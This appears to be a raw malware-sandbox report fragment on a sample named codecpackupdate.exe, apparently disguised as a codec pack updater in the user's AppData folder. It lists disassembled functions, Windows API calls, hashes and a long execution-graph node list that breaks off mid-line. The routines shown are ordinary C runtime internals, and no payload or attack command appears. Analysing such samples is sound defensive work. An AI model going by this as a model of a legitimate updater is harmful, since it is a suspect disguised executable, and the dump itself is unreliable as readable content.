                                                                          • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                          • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 714016831-0
                                                                          • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                          • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                          • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004044C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe$h5`
                                                                          • API String ID: 514040917-2106218412
                                                                          • Opcode ID: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                          • Instruction ID: a353362e766ed3f2c716cac6d89b577610a1520323eec6d1a1738d9fa524379f
                                                                          • Opcode Fuzzy Hash: e4c2509f1a48c11c220fc4324a28902978b1387e4841e844e69e582ca8f90123
                                                                          • Instruction Fuzzy Hash: B2115EB2900218BFD711EF99DD81CAB77BCEB45358B1100BBF605B3241E674AE148BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction ID: ab7933d84ada2b962503ad88361c81f9e178ef349f2d38840b4e325d6782f2f4
                                                                          • Opcode Fuzzy Hash: d387fd4f3eab095a78f7bb9c90f865f0c98a2a282a57ddd88524d606926be08d
                                                                          • Instruction Fuzzy Hash: 3E118F712003019FD7218F29EE459167BF5FB84765711853AF152E71B0C372D961CF1A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:9.6%
                                                                          Dynamic/Decrypted Code Coverage:83.9%
                                                                          Signature Coverage:1.3%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:44
                                                                          execution_graph 17641 402322 17646 a03c52 17641->17646 17644 40b93b 17647 a03c60 17646->17647 17648 a03c5b 17646->17648 17652 a03c75 17647->17652 17660 a0b821 17648->17660 17651 402324 Sleep 17651->17644 17653 a03c81 __fcloseall 17652->17653 17654 a03d2c __fcloseall 17653->17654 17657 a03ccf ___DllMainCRTStartup 17653->17657 17664 a03ae0 17653->17664 17654->17651 17656 a03ae0 __CRT_INIT@12 138 API calls 17656->17654 17657->17654 17658 a03ae0 __CRT_INIT@12 138 API calls 17657->17658 17659 a03d09 17657->17659 17658->17659 17659->17654 17659->17656 17661 a0b851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17660->17661 17662 a0b844 17660->17662 17663 a0b848 17661->17663 17662->17661 17662->17663 17663->17647 17665 a03aec __fcloseall 17664->17665 17666 a03af4 17665->17666 17667 a03b6e 17665->17667 17712 a08126 GetProcessHeap 17666->17712 17669 a03b72 17667->17669 17670 a03bd7 17667->17670 17674 a03b93 17669->17674 17683 a03afd __fcloseall __CRT_INIT@12 17669->17683 17813 a0839b 17669->17813 17672 a03c3a 17670->17672 17673 a03bdc 17670->17673 17671 a03af9 17671->17683 17713 a05cd4 17671->17713 17672->17683 17872 a05b64 17672->17872 17844 a0910b 17673->17844 17816 a08272 RtlDecodePointer 17674->17816 17680 a03b09 __RTC_Initialize 17680->17683 17690 a03b19 GetCommandLineA 17680->17690 17681 a03be7 17681->17683 17847 a089ac 17681->17847 17683->17657 17685 a03ba9 __CRT_INIT@12 17840 a03bc2 17685->17840 17686 a0b4bf __ioterm 60 API calls 17689 a03ba4 17686->17689 17692 a05d4a __mtterm 62 API calls 17689->17692 17734 a0b8bd GetEnvironmentStringsW 17690->17734 17692->17685 17694 a03c10 17696 a03c16 17694->17696 17697 a03c2e 17694->17697 17856 a05c21 17696->17856 17866 a02eb4 17697->17866 17701 a03b33 17703 a03b37 17701->17703 17766 a0b511 17701->17766 17702 a03c1e GetCurrentThreadId 17702->17683 17799 a05d4a 17703->17799 17707 a03b57 17707->17683 17808 a0b4bf 17707->17808 17712->17671 17880 a08442 RtlEncodePointer 17713->17880 17715 a05cd9 17885 a0895e 17715->17885 17718 a05ce2 17720 a05d4a __mtterm 62 API calls 17718->17720 17721 a05ce7 17720->17721 17721->17680 17723 a05cff 17724 a089ac __calloc_crt 59 API calls 17723->17724 17725 a05d0c 17724->17725 17726 a05d41 17725->17726 17727 a0912a __CRT_INIT@12 TlsSetValue 17725->17727 17728 a05d4a __mtterm 62 API calls 17726->17728 17729 a05d20 17727->17729 17730 a05d46 17728->17730 17729->17726 17731 a05d26 17729->17731 17730->17680 17732 a05c21 __initptd 59 API calls 17731->17732 17733 a05d2e GetCurrentThreadId 17732->17733 17733->17680 17735 a0b8d0 WideCharToMultiByte 17734->17735 17736 a03b29 17734->17736 17738 a0b903 17735->17738 17739 a0b93a FreeEnvironmentStringsW 17735->17739 17747 a0b20b 17736->17747 17896 a089f4 17738->17896 17739->17736 17742 a0b910 WideCharToMultiByte 17743 a0b926 17742->17743 17744 a0b92f FreeEnvironmentStringsW 17742->17744 17745 a02eb4 _free 59 API calls 17743->17745 17744->17736 17746 a0b92c 17745->17746 17746->17744 17748 a0b217 __fcloseall 17747->17748 17749 a0882d __lock 59 API calls 17748->17749 17750 a0b21e 17749->17750 17751 a089ac __calloc_crt 59 API calls 17750->17751 17752 a0b22f 17751->17752 17753 a0b29a GetStartupInfoW 17752->17753 17754 a0b23a __fcloseall @_EH4_CallFilterFunc@8 17752->17754 17760 a0b2af 17753->17760 17763 a0b3de 17753->17763 17754->17701 17755 a0b4a6 18149 a0b4b6 17755->18149 17757 a089ac __calloc_crt 59 API calls 17757->17760 17758 a0b42b GetStdHandle 17758->17763 17759 a0b43e GetFileType 17759->17763 17760->17757 17762 a0b2fd 17760->17762 17760->17763 17761 a0b331 GetFileType 17761->17762 17762->17761 17762->17763 17764 a0914c __ioinit InitializeCriticalSectionAndSpinCount 17762->17764 17763->17755 17763->17758 17763->17759 17765 a0914c __ioinit InitializeCriticalSectionAndSpinCount 17763->17765 17764->17762 17765->17763 17767 a0b524 GetModuleFileNameA 17766->17767 17768 a0b51f 17766->17768 17770 a0b551 17767->17770 18159 a051ca 17768->18159 18153 a0b5c4 17770->18153 17773 a03b43 17773->17707 17777 a0b740 17773->17777 17774 a089f4 __malloc_crt 59 API calls 17775 a0b58a 17774->17775 17775->17773 17776 a0b5c4 _parse_cmdline 59 API calls 17775->17776 17776->17773 17778 a0b749 17777->17778 17780 a0b74e _strlen 17777->17780 17779 a051ca ___initmbctable 71 API calls 17778->17779 17779->17780 17781 a089ac __calloc_crt 59 API calls 17780->17781 17784 a03b4c 17780->17784 17786 a0b784 _strlen 17781->17786 17782 a0b7d6 17783 a02eb4 _free 59 API calls 17782->17783 17783->17784 17784->17707 17793 a083aa 17784->17793 17785 a089ac __calloc_crt 59 API calls 17785->17786 17786->17782 17786->17784 17786->17785 17787 a0b7fd 17786->17787 17790 a0b814 17786->17790 18323 a06bfc 17786->18323 17788 a02eb4 _free 59 API calls 17787->17788 17788->17784 17791 a04e45 __invoke_watson 8 API calls 17790->17791 17792 a0b820 17791->17792 17795 a083b6 __IsNonwritableInCurrentImage 17793->17795 18332 a0d21f 17795->18332 17796 a083d4 __initterm_e 17798 a083f3 __cinit __IsNonwritableInCurrentImage 17796->17798 18335 a032e7 17796->18335 17798->17707 17800 a05d54 17799->17800 17802 a05d5a 17799->17802 18401 a090ec 17800->18401 17803 a08877 RtlDeleteCriticalSection 17802->17803 17804 a08893 17802->17804 17805 a02eb4 _free 59 API calls 17803->17805 17806 a0889f RtlDeleteCriticalSection 17804->17806 17807 a088b2 17804->17807 17805->17802 17806->17804 17807->17683 17811 a0b4c6 17808->17811 17809 a0b50e 17809->17703 17810 a02eb4 _free 59 API calls 17810->17811 17811->17809 17811->17810 17812 a0b4df RtlDeleteCriticalSection 17811->17812 17812->17811 17814 a084e4 _doexit 59 API calls 17813->17814 17815 a083a6 17814->17815 17815->17674 17817 a0829e 17816->17817 17818 a0828c 17816->17818 17819 a02eb4 _free 59 API calls 17817->17819 17818->17817 17820 a02eb4 _free 59 API calls 17818->17820 17821 a082ab 17819->17821 17820->17818 17822 a082cf 17821->17822 17825 a02eb4 _free 59 API calls 17821->17825 17823 a02eb4 _free 59 API calls 17822->17823 17824 a082db 17823->17824 17826 a02eb4 _free 59 API calls 17824->17826 17825->17821 17827 a082ec 17826->17827 17828 a02eb4 _free 59 API calls 17827->17828 17829 a082f7 17828->17829 17830 a0831c RtlEncodePointer 17829->17830 17833 a02eb4 _free 59 API calls 17829->17833 17831 a08331 17830->17831 17832 a08337 17830->17832 17834 a02eb4 _free 59 API calls 17831->17834 17835 a02eb4 _free 59 API calls 17832->17835 17836 a0834d 17832->17836 17838 a0831b 17833->17838 17834->17832 17835->17836 17837 a03b98 17836->17837 17839 a02eb4 _free 59 API calls 17836->17839 17837->17685 17837->17686 17838->17830 17839->17837 17841 a03bd4 17840->17841 17842 a03bc6 17840->17842 17841->17683 17842->17841 17843 a05d4a __mtterm 62 API calls 17842->17843 17843->17841 17845 a09122 TlsGetValue 17844->17845 17846 a0911e 17844->17846 17845->17681 17846->17681 17848 a089b3 17847->17848 17850 a03bf8 17848->17850 17852 a089d1 17848->17852 18404 a103f8 17848->18404 17850->17683 17853 a0912a 17850->17853 17852->17848 17852->17850 18412 a09445 Sleep 17852->18412 17854 a09140 17853->17854 17855 a09144 TlsSetValue 17853->17855 17854->17694 17855->17694 17857 a05c2d __fcloseall 17856->17857 17858 a0882d __lock 59 API calls 17857->17858 17859 a05c6a 17858->17859 18413 a05cc2 17859->18413 17862 a0882d __lock 59 API calls 17863 a05c8b ___addlocaleref 17862->17863 18416 a05ccb 17863->18416 17865 a05cb6 __fcloseall 17865->17702 17867 a02ee6 _free 17866->17867 17868 a02ebd HeapFree 17866->17868 17867->17683 17868->17867 17869 a02ed2 17868->17869 17870 a05d9b _malloc 57 API calls 17869->17870 17871 a02ed8 GetLastError 17870->17871 17871->17867 17873 a05b71 17872->17873 17879 a05b97 17872->17879 17874 a0910b __CRT_INIT@12 TlsGetValue 17873->17874 17876 a05b7f 17873->17876 17874->17876 17875 a0912a __CRT_INIT@12 TlsSetValue 17877 a05b8f 17875->17877 17876->17875 18421 a05a2f 17877->18421 17879->17683 17881 a08453 __init_pointers __initp_misc_winsig 17880->17881 17892 a0394a RtlEncodePointer 17881->17892 17883 a0846b __init_pointers 17884 a091ba 34 API calls 17883->17884 17884->17715 17886 a0896a 17885->17886 17888 a05cde 17886->17888 17893 a0914c 17886->17893 17888->17718 17889 a090ce 17888->17889 17890 a090e5 TlsAlloc 17889->17890 17891 a05cf4 17889->17891 17891->17718 17891->17723 17892->17883 17894 a09169 InitializeCriticalSectionAndSpinCount 17893->17894 17895 a0915c 17893->17895 17894->17886 17895->17886 17898 a08a02 17896->17898 17899 a08a34 17898->17899 17901 a02eec 17898->17901 17918 a09445 Sleep 17898->17918 17899->17739 17899->17742 17902 a02f67 17901->17902 17912 a02ef8 17901->17912 17903 a08143 _malloc RtlDecodePointer 17902->17903 17904 a02f6d 17903->17904 17906 a05d9b _malloc 58 API calls 17904->17906 17908 a02f5f 17906->17908 17907 a02f2b RtlAllocateHeap 17907->17908 17907->17912 17908->17898 17910 a02f03 17910->17912 17919 a08613 17910->17919 17928 a08670 17910->17928 17963 a0825c 17910->17963 17911 a02f53 17968 a05d9b 17911->17968 17912->17907 17912->17910 17912->17911 17916 a02f51 17912->17916 17966 a08143 RtlDecodePointer 17912->17966 17917 a05d9b _malloc 58 API calls 17916->17917 17917->17908 17918->17898 17971 a100be 17919->17971 17921 a0861a 17922 a08627 17921->17922 17924 a100be __NMSG_WRITE 59 API calls 17921->17924 17923 a08670 __NMSG_WRITE 59 API calls 17922->17923 17926 a08649 17922->17926 17925 a0863f 17923->17925 17924->17922 17927 a08670 __NMSG_WRITE 59 API calls 17925->17927 17926->17910 17927->17926 17929 a0868e __NMSG_WRITE 17928->17929 17931 a100be __NMSG_WRITE 55 API calls 17929->17931 17962 a087b5 17929->17962 17933 a086a1 17931->17933 17932 a0881e 17932->17910 17934 a087ba GetStdHandle 17933->17934 17935 a100be __NMSG_WRITE 55 API calls 17933->17935 17938 a087c8 _strlen 17934->17938 17934->17962 17936 a086b2 17935->17936 17936->17934 17937 a086c4 17936->17937 17937->17962 17987 a0f47d 17937->17987 17940 a08801 WriteFile 17938->17940 17938->17962 17940->17962 17942 a086f1 GetModuleFileNameW 17944 a08711 17942->17944 17952 a08721 __NMSG_WRITE 17942->17952 17943 a08822 18046 a04e45 IsProcessorFeaturePresent 17943->18046 17946 a0f47d __NMSG_WRITE 55 API calls 17944->17946 17946->17952 17949 a08767 17949->17943 18005 a0f411 17949->18005 17952->17943 17952->17949 17996 a0f4f2 17952->17996 17957 a0f411 __NMSG_WRITE 55 API calls 17959 a0879e 17957->17959 17959->17943 18039 a0448b 17962->18039 18132 a08228 GetModuleHandleExW 17963->18132 17967 a08156 17966->17967 17967->17912 18135 a05bb2 GetLastError 17968->18135 17970 a05da0 17970->17916 17972 a100c8 17971->17972 17973 a100d2 17972->17973 17974 a05d9b _malloc 59 API calls 17972->17974 17973->17921 17975 a100ee 17974->17975 17978 a04e35 17975->17978 17981 a04e0a RtlDecodePointer 17978->17981 17982 a04e1d 17981->17982 17983 a04e45 __invoke_watson 8 API calls 17982->17983 17984 a04e34 17983->17984 17985 a04e0a __gmtime64_s 8 API calls 17984->17985 17986 a04e41 17985->17986 17986->17921 17988 a0f488 17987->17988 17989 a0f496 17987->17989 17988->17989 17992 a0f4af 17988->17992 17990 a05d9b _malloc 59 API calls 17989->17990 17991 a0f4a0 17990->17991 17993 a04e35 __gmtime64_s 9 API calls 17991->17993 17994 a086e4 17992->17994 17995 a05d9b _malloc 59 API calls 17992->17995 17993->17994 17994->17942 17994->17943 17995->17991 17997 a0f500 17996->17997 17999 a0f509 17997->17999 18000 a0f504 17997->18000 18002 a0f543 17997->18002 17998 a05d9b _malloc 59 API calls 18004 a0f534 17998->18004 17999->17949 18000->17998 18000->17999 18001 a04e35 __gmtime64_s 9 API calls 18001->17999 18002->17999 18003 a05d9b _malloc 59 API calls 18002->18003 18003->18004 18004->18001 18006 a0f42b 18005->18006 18008 a0f41d 18005->18008 18007 a05d9b _malloc 59 API calls 18006->18007 18013 a0f435 18007->18013 18008->18006 18011 a0f457 18008->18011 18009 a04e35 __gmtime64_s 9 API calls 18010 a08787 18009->18010 18010->17943 18010->17957 18011->18010 18012 a05d9b _malloc 59 API calls 18011->18012 18012->18013 18013->18009 18040 a04493 18039->18040 18041 a04495 IsProcessorFeaturePresent 18039->18041 18040->17932 18043 a094cf 18041->18043 18081 a0947e IsDebuggerPresent 18043->18081 18047 a04e50 18046->18047 18089 a04cd8 18047->18089 18082 a09493 ___raise_securityfailure 18081->18082 18087 a09468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18082->18087 18084 a0949b ___raise_securityfailure 18088 a09453 GetCurrentProcess TerminateProcess 18084->18088 18086 a094b8 18086->17932 18087->18084 18088->18086 18090 a04cf2 ___raise_securityfailure __gmtime64_s 18089->18090 18091 a04d12 IsDebuggerPresent 18090->18091 18097 a09468 SetUnhandledExceptionFilter UnhandledExceptionFilter 18091->18097 18093 a0448b __atodbl_l 6 API calls 18094 a04dd6 ___raise_securityfailure 18094->18093 18097->18094 18133 a08241 GetProcAddress 18132->18133 18134 a08253 ExitProcess 18132->18134 18133->18134 18136 a0910b __CRT_INIT@12 TlsGetValue 18135->18136 18137 a05bc7 18136->18137 18138 a05c15 SetLastError 18137->18138 18139 a089ac __calloc_crt 56 API calls 18137->18139 18138->17970 18140 a05bda 18139->18140 18140->18138 18141 a0912a __CRT_INIT@12 TlsSetValue 18140->18141 18142 a05bee 18141->18142 18143 a05bf4 18142->18143 18144 a05c0c 18142->18144 18145 a05c21 __initptd 56 API calls 18143->18145 18146 a02eb4 _free 56 API calls 18144->18146 18147 a05bfc GetCurrentThreadId 18145->18147 18148 a05c12 18146->18148 18147->18138 18148->18138 18152 a08997 RtlLeaveCriticalSection 18149->18152 18151 a0b4bd 18151->17754 18152->18151 18154 a0b5e6 18153->18154 18158 a0b64a 18154->18158 18163 a11516 18154->18163 18156 a0b567 18156->17773 18156->17774 18157 a11516 _parse_cmdline 59 API calls 18157->18158 18158->18156 18158->18157 18160 a051d3 18159->18160 18161 a051da 18159->18161 18219 a05527 18160->18219 18161->17767 18166 a114bc 18163->18166 18169 a021bb 18166->18169 18170 a021cc 18169->18170 18176 a02219 18169->18176 18177 a05b9a 18170->18177 18172 a021d2 18173 a021f9 18172->18173 18182 a050ff 18172->18182 18173->18176 18197 a05481 18173->18197 18176->18154 18178 a05bb2 __getptd_noexit 59 API calls 18177->18178 18179 a05ba0 18178->18179 18180 a05bad 18179->18180 18181 a0837f __amsg_exit 59 API calls 18179->18181 18180->18172 18181->18180 18183 a0510b __fcloseall 18182->18183 18184 a05b9a FindHandler 59 API calls 18183->18184 18185 a05114 18184->18185 18198 a0548d __fcloseall 18197->18198 18199 a05b9a FindHandler 59 API calls 18198->18199 18220 a05533 __fcloseall 18219->18220 18221 a05b9a FindHandler 59 API calls 18220->18221 18222 a0553b 18221->18222 18223 a05481 _LocaleUpdate::_LocaleUpdate 59 API calls 18222->18223 18224 a05545 18223->18224 18244 a05222 18224->18244 18227 a089f4 __malloc_crt 59 API calls 18228 a05567 18227->18228 18229 a05694 __fcloseall 18228->18229 18251 a056cf 18228->18251 18229->18161 18245 a021bb _LocaleUpdate::_LocaleUpdate 59 API calls 18244->18245 18246 a05232 18245->18246 18247 a05241 GetOEMCP 18246->18247 18248 a05253 18246->18248 18249 a0526a 18247->18249 18248->18249 18250 a05258 GetACP 18248->18250 18249->18227 18249->18229 18250->18249 18324 a06c15 18323->18324 18325 a06c07 18323->18325 18326 a05d9b _malloc 59 API calls 18324->18326 18325->18324 18329 a06c2b 18325->18329 18327 a06c1c 18326->18327 18328 a04e35 __gmtime64_s 9 API calls 18327->18328 18330 a06c26 18328->18330 18329->18330 18331 a05d9b _malloc 59 API calls 18329->18331 18330->17786 18331->18327 18333 a0d222 RtlEncodePointer 18332->18333 18333->18333 18334 a0d23c 18333->18334 18334->17796 18402 a09103 TlsFree 18401->18402 18403 a090ff 18401->18403 18402->17802 18403->17802 18405 a10403 18404->18405 18409 a1041e 18404->18409 18406 a1040f 18405->18406 18405->18409 18408 a05d9b _malloc 58 API calls 18406->18408 18407 a1042e RtlAllocateHeap 18407->18409 18410 a10414 18407->18410 18408->18410 18409->18407 18409->18410 18411 a08143 _malloc RtlDecodePointer 18409->18411 18410->17848 18411->18409 18412->17852 18419 a08997 RtlLeaveCriticalSection 18413->18419 18415 a05c84 18415->17862 18420 a08997 RtlLeaveCriticalSection 18416->18420 18418 a05cd2 18418->17865 18419->18415 18420->18418 18423 a05a3b __fcloseall 18421->18423 18422 a05a54 18425 a05a63 18422->18425 18427 a02eb4 _free 59 API calls 18422->18427 18423->18422 18424 a02eb4 _free 59 API calls 18423->18424 18426 a05b43 __fcloseall 18423->18426 18424->18422 18428 a02eb4 _free 59 API calls 18425->18428 18430 a05a72 18425->18430 18426->17879 18427->18425 18428->18430 18429 a05a81 18432 a05a90 18429->18432 18433 a02eb4 _free 59 API calls 18429->18433 18430->18429 18431 a02eb4 _free 59 API calls 18430->18431 18431->18429 18434 a05a9f 18432->18434 18435 a02eb4 _free 59 API calls 18432->18435 18433->18432 18436 a05aae 18434->18436 18437 a02eb4 _free 59 API calls 18434->18437 18435->18434 18438 a05ac0 18436->18438 18439 a02eb4 _free 59 API calls 18436->18439 18437->18436 18440 a0882d __lock 59 API calls 18438->18440 18439->18438 18443 a05ac8 18440->18443 18441 a05aeb 18453 a05b4f 18441->18453 18443->18441 18445 a02eb4 _free 59 API calls 18443->18445 18445->18441 18446 a0882d __lock 59 API calls 18451 a05aff ___removelocaleref 18446->18451 18447 a05b30 18486 a05b5b 18447->18486 18450 a02eb4 _free 59 API calls 18450->18426 18451->18447 18456 a04f05 18451->18456 18489 a08997 RtlLeaveCriticalSection 18453->18489 18455 a05af8 18455->18446 18457 a04f7e 18456->18457 18459 a04f1a 18456->18459 18458 a02eb4 _free 59 API calls 18457->18458 18460 a04fcb 18457->18460 18461 a04f9f 18458->18461 18459->18457 18468 a04f4b 18459->18468 18470 a02eb4 _free 59 API calls 18459->18470 18462 a04ff4 18460->18462 18530 a0d47d 18460->18530 18464 a02eb4 _free 59 API calls 18461->18464 18466 a05053 18462->18466 18482 a02eb4 59 API calls _free 18462->18482 18467 a04fb2 18464->18467 18472 a02eb4 _free 59 API calls 18466->18472 18473 a02eb4 _free 59 API calls 18467->18473 18474 a02eb4 _free 59 API calls 18468->18474 18485 a04f69 18468->18485 18469 a02eb4 _free 59 API calls 18475 a04f73 18469->18475 18476 a04f40 18470->18476 18471 a02eb4 _free 59 API calls 18471->18462 18478 a05059 18472->18478 18479 a04fc0 18473->18479 18480 a04f5e 18474->18480 18481 a02eb4 _free 59 API calls 18475->18481 18490 a0d31a 18476->18490 18478->18447 18483 a02eb4 _free 59 API calls 18479->18483 18518 a0d416 18480->18518 18481->18457 18482->18462 18483->18460 18485->18469 18706 a08997 RtlLeaveCriticalSection 18486->18706 18488 a05b3d 18488->18450 18489->18455 18491 a0d412 18490->18491 18492 a0d329 18490->18492 18491->18468 18493 a0d33a 18492->18493 18495 a02eb4 _free 59 API calls 18492->18495 18494 a0d34c 18493->18494 18496 a02eb4 _free 59 API calls 18493->18496 18497 a0d35e 18494->18497 18498 a02eb4 _free 59 API calls 18494->18498 18495->18493 18496->18494 18499 a0d370 18497->18499 18500 a02eb4 _free 59 API calls 18497->18500 18498->18497 18501 a0d382 18499->18501 18503 a02eb4 _free 59 API calls 18499->18503 18500->18499 18502 